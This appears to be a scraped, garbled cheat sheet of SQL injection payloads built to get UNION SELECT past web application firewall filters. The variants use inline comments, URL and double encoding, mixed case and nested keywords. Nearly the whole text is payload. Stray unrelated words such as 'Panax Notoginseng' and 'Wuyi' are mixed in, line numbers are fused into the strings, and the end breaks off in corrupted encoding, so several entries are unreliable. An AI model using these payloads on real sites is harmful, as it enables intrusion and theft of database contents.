1 #2 #3 #4 #WAF bypassing Strings:5 6 /*!%55nion*/ /*!%53elect*/7 8 %55nion (%53elect1,2,3)-- -9 Ten +Union+distinct+Select+ One A +Union+Distinctrow+Select+ - - /**//*!12345union SELECT*//**/ the - /**//*!50000union SELECT*//**/ - - /**/UNION/**//*!50000select*//**/ + - /*!50000union SeLeCt*/ + A Union /*!50000%53elect*/ at - +#UNiOn+#sEleCt - - +#1q%0AuNiOn All#qa%0a#%0AsEleCt - - /*!%55nion*/ /*!%53elect*/ in - /*!u%6eion*/ /*!se%6cect*/ to + +Un/**/Ion+Se/**/lect - theUni%0bon+Se%0blect * $ %2f**%2funion%2f**%2fselectPanax Notoginseng - Union%23foo*%2F*Bar%0D%0Aselect%23foo%0D%0A the + REVERSE(Noinu)+REVERSE(tceles) A the /*--*/Union/*--*/Select/*--*/ + - Union(/*!/**/ SeleCT */ 1,2,3) $ $ /*!union*/+/*!select*/ - - Union+/*!select*/ the - /**/Union/**/Select/**/Wuyi the /**/UNIon/**/sEleCt/**/ - Wu /**//*!union*//**//*!select*//**/ - About /*!union*/ /*! SelECt*/ $ - +Union+distinct+Select+ - - +Union+Distinctrow+Select+ A + +UnIOn%0d%0aSeleCt%0d%0a the - UNION/*&test=1*/SELECT/*&pwn=2*/ $ theUn?+Un/**/Ion+Se/**/Lect+ the the +Ununionion+Seselectlect+ the - +Uni%0bon+Se%0blect+ in the %252f%252a*/Union%252f%252a/Select%252f%252a*/ the About /%2 A%2 A/Union/%2 A%2 A/Select/%2 A%2 A/ the the %2f**%2funion%2f**%2fselect%2f**%2f the + Union%23foo*%2F*Bar%0D%0Aselect%23foo%0D%0A - the /*! UnIoN*/SeLecT+Bayi the ## the # - # -#Union Select byPASS withURL encoded Method: the the %55nion (%53elect) the the Union%20distinct%20Select - the Union% -%64istinctRO% $%20Select the the Union%2053elect94 the % at?%0auion% -?% at?%0aselect the the % at? Zen?%0Aunionall%23zen%0A%23Zen%0Aselect98 About %55nion%53eLEct - 101U%6eion SE%6cect102 103Unio%6e%73elect104 theUnio%6e% -%64istinc% About% -%73elect106 107Uni%6fndistinct%52OW s%65lect108 109 % the%6e%6f% the%6e% A%6c%6c% the% $%6c% $% the%7
SQL injection bypasses Union select filtering